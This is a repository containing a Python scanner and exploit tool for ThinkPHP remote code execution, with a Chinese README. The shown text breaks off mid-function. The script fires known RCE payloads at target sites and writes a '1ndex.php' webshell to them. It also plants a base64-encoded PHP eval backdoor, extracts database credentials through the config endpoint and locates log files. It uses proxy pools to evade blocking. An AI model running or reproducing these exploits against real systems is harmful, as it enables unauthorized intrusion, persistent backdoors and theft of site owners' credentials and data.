├── .gitignore ├── LICENSE ├── README.md └── thinkphp_rce.py /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | pip-wheel-metadata/ 24 | share/python-wheels/ 25 | *.egg-info/ 26 | .installed.cfg 27 | *.egg 28 | MANIFEST 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .nox/ 44 | .coverage 45 | .coverage.* 46 | .cache 47 | nosetests.xml 48 | coverage.xml 49 | *.cover 50 | *.py,cover 51 | .hypothesis/ 52 | .pytest_cache/ 53 | 54 | # Translations 55 | *.mo 56 | *.pot 57 | 58 | # Django stuff: 59 | *.log 60 | local_settings.py 61 | db.sqlite3 62 | db.sqlite3-journal 63 | 64 | # Flask stuff: 65 | instance/ 66 | .webassets-cache 67 | 68 | # Scrapy stuff: 69 | .scrapy 70 | 71 | # Sphinx documentation 72 | docs/_build/ 73 | 74 | # PyBuilder 75 | target/ 76 | 77 | # Jupyter Notebook 78 | .ipynb_checkpoints 79 | 80 | # IPython 81 | profile_default/ 82 | ipython_config.py 83 | 84 | # pyenv 85 | .python-version 86 | 87 | # pipenv 88 | # According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control. 89 | # However, in case of collaboration, if having platform-specific dependencies or dependencies 90 | # having no cross-platform support, pipenv may install dependencies that don't work, or not 91 | # install all needed dependencies. 92 | #Pipfile.lock 93 | 94 | # PEP 582; used by e.g. 
github.com/David-OConnor/pyflow 95 | __pypackages__/ 96 | 97 | # Celery stuff 98 | celerybeat-schedule 99 | celerybeat.pid 100 | 101 | # SageMath parsed files 102 | *.sage.py 103 | 104 | # Environments 105 | .env 106 | .venv 107 | env/ 108 | venv/ 109 | ENV/ 110 | env.bak/ 111 | venv.bak/ 112 | 113 | # Spyder project settings 114 | .spyderproject 115 | .spyproject 116 | 117 | # Rope project settings 118 | .ropeproject 119 | 120 | # mkdocs documentation 121 | /site 122 | 123 | # mypy 124 | .mypy_cache/ 125 | .dmypy.json 126 | dmypy.json 127 | 128 | # Pyre type checker 129 | .pyre/ 130 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 
25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. 
For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. 
If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. 
You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. 
You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. 
(Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ThinkphpRCE 2 | Thinkphp rce扫描脚本,附带日志扫描 3 | 4 | - 2020.06.18 更新 5 | 1. 增加使用代理池功能 6 | 2. 增加输出到文件功能 7 | 3. 去掉了一些使用system函数的payload和重复payload(导致IP容易被封,且必要性不是很大) 8 | 4. 
优化了一些代码,多个网站的时候显示进度 9 | 10 | - 使用方法(python3.x) 11 | ``` 12 | usage: thinkphp_rce.py [-h] [-u URL] [-f FILE] [-p PROXY] [--shell] 13 | 14 | Thinkphp Scan 15 | 16 | optional arguments: 17 | -h, --help show this help message and exit 18 | -u URL, --url URL Start scanning url -u xxx.com 19 | -f FILE, --file FILE read the url from the file 20 | -p PROXY, --proxy PROXY 21 | use HTTP/HTTPS proxy 22 | --shell try to get shell 23 | ``` 24 | ``` 25 | python3 thinkphp_rce.py -u http://192.168.76.248/thinkphp520/public/ 26 | 27 | python3 thinkphp_rce.py -h host.txt 28 | 29 | python3 thinkphp_rce.py -u http://192.168.76.248/thinkphp520/public/ --shell //批量检测和getshell 30 | 31 | python3 thinkphp_rce.py -u http://192.168.76.248/thinkphp520/public/ --proxy proxy.txt //使用代理池(http/https) 32 | ``` 33 | - proxy.txt 34 | ``` 35 | 127.0.0.1:8080 36 | 114.107.150.215:46213 37 | ``` -------------------------------------------------------------------------------- /thinkphp_rce.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | 3 | import requests 4 | from urllib import parse 5 | import urllib3 6 | import base64 7 | import argparse 8 | import time 9 | import random 10 | import sys 11 | from bs4 import BeautifulSoup 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | # requests.packages.urllib3.disable_warnings() 15 | 16 | headers = { 17 | 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:76.0) Gecko/20100101 Firefox/76.0', 18 | 'Accept': 'application/json, text/plain, */*', 19 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 20 | 'Accept-Encoding': 'gzip, deflate', 21 | 'Content-Type': 'application/x-www-form-urlencoded', 22 | 'Connection': 'close'} 23 | 24 | def proxy_get(host, proxy): 25 | if proxy: 26 | proxies = random.choice(proxy) 27 | proxies_use = {"http": "http://{}".format(proxies.strip('\n')), "https": "https://{}".format(proxies.strip('\n'))} 28 
| try: 29 | res = requests.get(url=host, headers=headers, verify=False, proxies=proxies_use, timeout=5) 30 | res.encoding = 'utf-8' 31 | if res.status_code == 500 and 'ThinkPHP' in res.text: 32 | sta_code = 200 33 | else: 34 | sta_code = res.status_code 35 | except: 36 | sta_code = 100 37 | while sta_code != 200: 38 | proxy.remove(proxies) 39 | if proxy: 40 | proxies = random.choice(proxy) 41 | proxies_use = {"http": "http://{}".format(proxies.strip('\n')), "https": "https://{}".format(proxies.strip('\n'))} 42 | try: 43 | res = requests.get(url=host, headers=headers, verify=False, allow_redirects=False, proxies=proxies_use, timeout=5) 44 | sta_code = res.status_code 45 | except: 46 | pass 47 | else: 48 | print('没有代理可用了') 49 | sys.exit(0) 50 | else: 51 | proxy = False 52 | proxies_use = [] 53 | return proxies_use, proxy 54 | 55 | def req_get(url, proxy): 56 | res_body = '' 57 | if proxy: 58 | try: 59 | res = requests.get(url=url, headers=headers, verify=False, allow_redirects=False, proxies=proxy, timeout=5) 60 | res.encoding = 'utf-8' 61 | # res_body = res.text 62 | except: 63 | print("\033[1;31m网络出错!\033[0m") 64 | pass 65 | else: 66 | try: 67 | res = requests.get(url=url, headers=headers, verify=False, allow_redirects=False, timeout=5) 68 | res.encoding = 'utf-8' 69 | # res_body = res.text 70 | except: 71 | print("\033[1;31m网络出错!\033[0m") 72 | pass 73 | return res 74 | 75 | def req_post(url, proxy, data): 76 | res_body = '' 77 | if proxy: 78 | try: 79 | res = requests.post(url=url, headers=headers, verify=False, data=data, allow_redirects=False, proxies=proxy, timeout=5) 80 | res.encoding = 'utf-8' 81 | except: 82 | print("\033[1;31m网络出错!\033[0m") 83 | pass 84 | else: 85 | try: 86 | res = requests.post(url=url, headers=headers, verify=False, data=data, allow_redirects=False, timeout=5) 87 | res.encoding = 'utf-8' 88 | except: 89 | print("\033[1;31m网络出错!\033[0m") 90 | pass 91 | return res 92 | 93 | def think_rce_check(host, proxy): 94 | print('\033[1;34m[!] 
thinkphp_RCE探测:\033[0m') 95 | # 5.0.x命令执行,<=5.0.24 96 | success = [] 97 | headers["Host"] = parse.urlparse(host).hostname 98 | payloads = [r"/?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1", 99 | r"/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", 100 | r"/?s=index/think\request/input?data[]=phpinfo()&filter=assert", 101 | r"/?s=index/\think\view\driver\Php/display&content=", 102 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()", 103 | r"/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1", 104 | r"/?s=index/\think\Request/input&filter[]=phpinfo&data=-1", 105 | r"/?s=index/\think\module/action/param1/${@phpinfo()}"] 106 | for i in payloads: 107 | url1 = host + i 108 | proxies, proxy = proxy_get(host, proxy) 109 | res_body_1 = req_get(url1, proxies) 110 | if ('PHP Version' in res_body_1.text) or ('PHP Extension Build' in res_body_1.text): 111 | success.append(url1) 112 | else: 113 | pass 114 | 115 | # ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha 116 | url2 = host + "/?s=captcha&test=-1" 117 | post_2 = [r'_method=__construct&filter=phpinfo&method=get&server[REQUEST_METHOD]=1', 118 | r'_method=__construct&filter[]=phpinfo&method=GET&get[]=1'] 119 | query_2 = '/?s=captcha&test=-1' 120 | for j in post_2: 121 | proxies, proxy = proxy_get(host, proxy) 122 | res_body_2 = req_post(url2, proxies, j) 123 | if ('PHP Version' in res_body_2.text) or ('PHP Extension Build' in res_body_2.text): 124 | payload_post2 = url2 + " POST: " + j 125 | success.append(payload_post2) 126 | else: 127 | pass 128 | 129 | url3 = host + "/?s=captcha&test=phpinfo()" 130 | post_3 = r'_method=__construct&filter[]=assert&method=get&server[REQUEST_METHOD]=-1' 131 | proxies, proxy = proxy_get(host, proxy) 132 | res_body_3 = req_post(url3, proxies, post_3) 133 | if ('PHP Version' in 
res_body_3.text) or ('PHP Extension Build' in res_body_3.text): 134 | payload_post3 = url3 + " POST: " + post_3 135 | success.append(payload_post3) 136 | else: 137 | pass 138 | 139 | # ThinkPHP <= 5.0.13 140 | url4 = host + "/?s=index/index/" 141 | post_4 = [r's=-1&_method=__construct&method=get&filter[]=phpinfo', 142 | r'_method=__construct&method=get&filter[]=phpinfo&get[]=-1'] 143 | for k in post_4: 144 | proxies, proxy = proxy_get(host, proxy) 145 | res_body_4 = req_post(url4, proxies, k) 146 | if ('PHP Version' in res_body_4.text) or ('PHP Extension Build' in res_body_4.text): 147 | payload_post4 = url4 + " POST: " + k 148 | success.append(payload_post4) 149 | else: 150 | pass 151 | 152 | # ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug 153 | url5 = host 154 | post_5 = [r'_method=__construct&filter[]=phpinfo&server[REQUEST_METHOD]=-1'] 155 | for h in post_5: 156 | proxies, proxy = proxy_get(host, proxy) 157 | res_body_5 = req_post(url5, proxies, h) 158 | if ('PHP Version' in res_body_5.text) or ('PHP Extension Build' in res_body_5.text): 159 | payload_post5 = url5 + " POST: " + h 160 | success.append(payload_post5) 161 | else: 162 | pass 163 | 164 | if success: 165 | print("\033[1;34m[!] 存在thinkphp_RCE! 可用Payload:\033[0m") 166 | for p in success: 167 | print("\033[1;32m{}\033[0m".format(p)) 168 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 169 | fo.write(p + '\n') 170 | fo.close() 171 | else: 172 | print("\033[1;31m[!] 
不存在thinkphp_RCE!\033[0m") 173 | 174 | 175 | def getshell(host,proxy): 176 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 177 | print("\033[1;34m[!]正在尝试Getshell:\033[0m") 178 | headers["Host"] = parse.urlparse(host).hostname 179 | success = False 180 | shell = "" 181 | shell_url = host + "/1ndex.php" 182 | payload = [ 183 | r"/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=1ndex.php&vars[1][]=" + shell, 184 | r"/?s=index/\think\template\driver\file/write&cacheFile=1ndex.php&content=" + shell, 185 | ] 186 | for k in payload: 187 | url = host + k 188 | proxies, proxy = proxy_get(host, proxy) 189 | req_get(url, proxies) 190 | getshell_res = req_get(shell_url, proxies) 191 | if getshell_res.status_code == 200: 192 | print("\033[1;32m[+] Getshell succeed,shell address: " + host + "/1ndex.php\n\033[0m") 193 | fo.write('Getshell succeed,shell address: {}/1ndex.php'.format(host)) 194 | success = True 195 | break 196 | else: 197 | pass 198 | 199 | if not success: 200 | # ThinkPHP <= 5.0.23 需要存在xxx的method路由,例如captcha 201 | post_payload2 = r'_method=__construct&filter=system&method=get&server[REQUEST_METHOD]=-1' 202 | # try: 203 | proxies, proxy = proxy_get(host, proxy) 204 | url2 = host + '/?s=captcha&test=echo+\'"{}"\'+>>1ndex.php'.format(shell) 205 | req_post(url2, proxies, post_payload2) 206 | getshell_res2 = req_get(shell_url, proxies) 207 | if getshell_res2.status_code == 200: 208 | print("\033[1;32m[+] Getshell succeed,shell address: " + host + "/1ndex.php\n\033[0m") 209 | fo.write('Getshell succeed,shell address: {}/1ndex.php\n'.format(host)) 210 | success = True 211 | else: 212 | pass 213 | 214 | if not success: 215 | # ThinkPHP <= 5.0.13 216 | post_payload3 = [r's=echo+ "{}" +>>1ndex.php&_method=__construct&method=&filter[]=system'.format(shell), 217 | r'_method=__construct&filter[]=system&mytest=echo+ "{}" +>>1ndex.php'.format(shell)] 218 | for h in post_payload3: 219 | # try: 220 | proxies, 
proxy = proxy_get(host, proxy) 221 | url3 = host + "/?s=index/index" 222 | req_post(url3,proxies, h) 223 | getshell_res3 = req_get(shell_url, proxies) 224 | if getshell_res3.status_code == 200: 225 | print("\033[1;32m[+] Getshell succeed,shell address: " + host + "/1ndex.php\n\033[0m") 226 | fo.write('Getshell succeed,shell address: {}/1ndex.php\n'.format(host)) 227 | success = True 228 | break 229 | else: 230 | pass 231 | 232 | if not success: 233 | # 参考链接:https://www.cnblogs.com/r00tuser/p/11410157.html 234 | sess = "hahahatest" 235 | headers.update({"Cookie": "PHPSESSID={}".format(sess)}) 236 | sess_dir = 'php://filter/read=convert.base64-decode/resource=/tmp/sess_{}'.format(sess).encode(encoding="utf-8") 237 | base64_ = base64.b64encode(sess_dir).decode() 238 | post_payload4 = r'_method=__construct&filter[]=think\Session::set&method=get&get[]=abPD9waHAgQGV2YWwoYmFzZTY0X2RlY29kZSgkX0dFVFsnciddKSk7Oz8%2bab&server[]=1' 239 | post_res = r'_method=__construct&filter[]=base64_decode&filter[]=think\__include_file&method=get&server[]=1&get[]={}'.format( 240 | base64_) 241 | proxies, proxy = proxy_get(host, proxy) 242 | url4 = host + "/?s=captcha&test=1" 243 | req_post(url4, proxies,post_payload4) 244 | shell_add_4 = host + "/?s=captcha&r=cGhwaW5mbygpOw==" 245 | getshell_res4 = req_post(shell_add_4, proxies,post_res) 246 | if ('PHP Version' in getshell_res4.text) or ('PHP Extension Build' in getshell_res4.text): 247 | print( 248 | "\033[1;32m[+] Getshell success, You can use POST " + host + "/?s=captcha&r=cGhwaW5mbygpOw==\n\033[0m" + "\033[1;32m[=] _method=__construct&filter[]=base64_decode&filter[]=think\__include_file&method=get&server[]=1&get[]={}\033[0m".format( 249 | base64_)) 250 | print("\033[1;32m[+] r 参数是命令的base64编码\n\033[0m") 251 | fo.write('Getshell succeed,shell address: {}/?s=captcha&r=cGhwaW5mbygpOw==\n'.format(host)) 252 | fo.write('r 参数是命令的base64编码\n') 253 | success = True 254 | else: 255 | pass 256 | 257 | 258 | if not success: 259 | post_payload5 = 
r'_method=__construct&method=get&filter[]=call_user_func&server[]=phpinfo&get[]={}'.format( 260 | shell) 261 | time_dir = time.strftime("%Y%m/%d", time.localtime()) 262 | try: 263 | proxies, proxy = proxy_get(host, proxy) 264 | url5 = host + "/?s=captcha" 265 | req_post(url5,proxies,post_payload5) 266 | dir_ = "/../../runtime/log/{}.log".format(time_dir) 267 | shell_url_5 = host + "/?s=index/\\think\Lang/load&file=" + dir_ 268 | getshell_res5 = req_get(shell_url_5, proxies) 269 | if ("098f6bcd4621d373cade4e832627b4f6" in getshell_res5.text): 270 | print('\033[1;32m[+] Getshell success: ' + shell_url_5 + "\n\033[0m") 271 | fo.write('Getshell success: {}\n'.format(shell_url_5)) 272 | success = True 273 | else: 274 | pass 275 | except: 276 | pass 277 | if not success: 278 | print("\033[1;31m[!]Getshell失败!\033[0m") 279 | fo.close() 280 | return success 281 | 282 | 283 | def get_mysql_conf(host): 284 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 285 | headers["Host"] = parse.urlparse(host).hostname 286 | print("\033[1;34m[!] 
尝试获取数据库配置:\033[0m") 287 | mysql_success = False 288 | try: 289 | name = requests.get(url=host + "/?s=index/think\config/get&name=database.username", headers=headers, timeout=5, 290 | verify=False, allow_redirects=False) 291 | hostname = requests.get(url=host + "/?s=index/think\config/get&name=database.hostname", headers=headers, 292 | timeout=5, 293 | verify=False, allow_redirects=False) 294 | password = requests.get(url=host + "/?s=index/think\config/get&name=database.password", headers=headers, 295 | timeout=5, 296 | verify=False, allow_redirects=False) 297 | database = requests.get(url=host + "/?s=index/think\config/get&name=database.database", headers=headers, 298 | timeout=5, 299 | verify=False, allow_redirects=False) 300 | if len(name.text) >0 and len(name.text)< 100: 301 | fo.write('database username: {}\n'.format(name.text)) 302 | print("\033[1;32m[+] database username: \033[0m" + name.text) 303 | mysql_success = True 304 | if len(hostname.text) >0 and len(hostname.text)< 100: 305 | fo.write('database hostname: {}\n'.format(hostname.text)) 306 | print("\033[1;32m[+] database hostname: \033[0m" + hostname.text) 307 | if len(password.text) >0 and len(password.text)< 100: 308 | fo.write('database password: {}\n'.format(password.text)) 309 | print("\033[1;32m[+] database password: \033[0m" + password.text) 310 | if len(database.text) >0 and len(database.text)< 100: 311 | fo.write('database name: {}\n'.format(database.text)) 312 | print("\033[1;32m[+] database name: \033[0m" + database.text) 313 | if not mysql_success: 314 | print("\033[1;31m[!] 数据库配置获取失败\033[0m") 315 | except: 316 | pass 317 | fo.close() 318 | 319 | def log_find(host): 320 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 321 | headers["Host"] = parse.urlparse(host).hostname 322 | print('\033[1;34m[!] 
日志文件路径探测:\033[0m') 323 | time_dir_5 = time.strftime("%Y%m/%d", time.localtime()) 324 | # thinkphp 5 主日志 info 325 | log_dir_info_5 = host + "/../../runtime/log/{}.log".format(time_dir_5) 326 | # 错误日志 error 327 | log_dir_error_5 = host + "/../../runtime/log/{}_error.log".format(time_dir_5) 328 | # sql日志 sql 329 | log_dir_sql_5 = host + "/../../runtime/log/{}_sql.log".format(time_dir_5) 330 | try: 331 | info_res = requests.get(url=log_dir_info_5, headers=headers, timeout=5, verify=False, allow_redirects=False) 332 | error_res = requests.get(url=log_dir_error_5, headers=headers, timeout=5, verify=False, allow_redirects=False) 333 | sql_res = requests.get(url=log_dir_sql_5, headers=headers, timeout=5, verify=False, allow_redirects=False) 334 | if info_res.status_code == 200 and ( 335 | ("[ info ]" in info_res.text) or ("[ sql ]" in info_res.text) or ("[ error ]" in info_res.text)): 336 | fo.write('info日志存在: {}\n'.format(log_dir_info_5)) 337 | print("\033[1;32m[+] info日志存在: \033[0m" + log_dir_info_5) 338 | if error_res.status_code == 200 and ( 339 | ("[ info ]" in error_res.text) or ("[ sql ]" in error_res.text) or ("[ error ]" in error_res.text)): 340 | fo.write('error日志存在: {}\n'.format(log_dir_error_5)) 341 | print("\033[1;32m[+] error日志存在: \033[0m" + log_dir_error_5) 342 | if sql_res.status_code == 200 and ( 343 | ("[ info ]" in sql_res.text) or ("[ sql ]" in sql_res.text) or ("[ error ]" in sql_res.text)): 344 | fo.write('sql日志存在: {}\n'.format(log_dir_sql_5)) 345 | print("\033[1;32m[+] sql日志存在: \033[0m" + log_dir_sql_5) 346 | except: 347 | print("\033[1;31m网络出错!\033[0m") 348 | 349 | # thinkphp 3 日志 350 | time_dir_3 = time.strftime("%y_%m_%d", time.localtime()) 351 | log_dir_3_1 = host + "/Application/Runtime/Logs/Home/{}.log".format(time_dir_3) 352 | log_dir_3_2 = host + "/Runtime/Logs/Home/{}.log".format(time_dir_3) 353 | log_dir_3_3 = host + "/Runtime/Logs/Common/{}.log".format(time_dir_3) 354 | log_dir_3_4 = host + 
"/Application/Runtime/Logs/Common/{}.log".format(time_dir_3) 355 | log_dir_3_5 = host + "/App/Runtime/Logs/Home/{}.log".format(time_dir_3) 356 | log_dir_3 = [log_dir_3_1, log_dir_3_2, log_dir_3_3, log_dir_3_4, log_dir_3_5] 357 | for i in log_dir_3: 358 | try: 359 | log_3_res = requests.get(url=i, headers=headers, timeout=5, verify=False, allow_redirects=False) 360 | log_3_res.encoding = 'utf-8' 361 | if log_3_res.status_code == 200 and (("INFO:" in log_3_res.text) or ("SQL语句" in log_3_res.text) or ("ERR:" in log_3_res.text)): 362 | fo.write('日志存在: {}\n'.format(i)) 363 | print("\033[1;32m[+] 日志存在: \033[0m" + i) 364 | else: 365 | pass 366 | except: 367 | print("\033[1;31m网络出错!\033[0m") 368 | fo.close() 369 | 370 | def check_dubug(host): 371 | fo = open('{}.txt'.format(parse.urlparse(host).hostname), 'a') 372 | headers["Host"] = parse.urlparse(host).hostname 373 | div_html_5 = '' 374 | div_html_3 = '' 375 | print("\033[1;34m[+] 检测Debug模式是否开启: \033[0m") 376 | debug_bool = False 377 | url_debug = ["indx.php", "/index.php/?s=index/inex/"] 378 | for i in url_debug: 379 | try: 380 | res_debug = requests.get(url=host + i, headers=headers, timeout=5, verify=False, allow_redirects=False) 381 | res_debug.encoding = 'utf-8' 382 | if ("Environment Variables" in res_debug.text) or ("错误位置" in res_debug.text): 383 | print("\033[1;32m[+] Debug 模式已开启!\033[0m") 384 | debug_bool = True 385 | res_debug_html = BeautifulSoup(res_debug.text, 'html.parser') 386 | div_html_5 = res_debug_html.findAll('div', {'class': 'clearfix'}) 387 | div_html_3 = res_debug_html.find('sup') 388 | div_html_3_path = res_debug_html('div', {'class': 'text'}) 389 | break 390 | except: 391 | print("\033[1;31m[+] 检测出错\033[0m") 392 | if debug_bool == False: 393 | print("\033[1;31m[+] Debug 模式未开启!\033[0m") 394 | if debug_bool: 395 | if div_html_5: 396 | for j in div_html_5: 397 | if j.strong.text == 'THINK_VERSION': 398 | fo.write('ThinkPHP Version: {}\n'.format(j.small.text.strip())) 399 | print("\033[1;32m[+] 
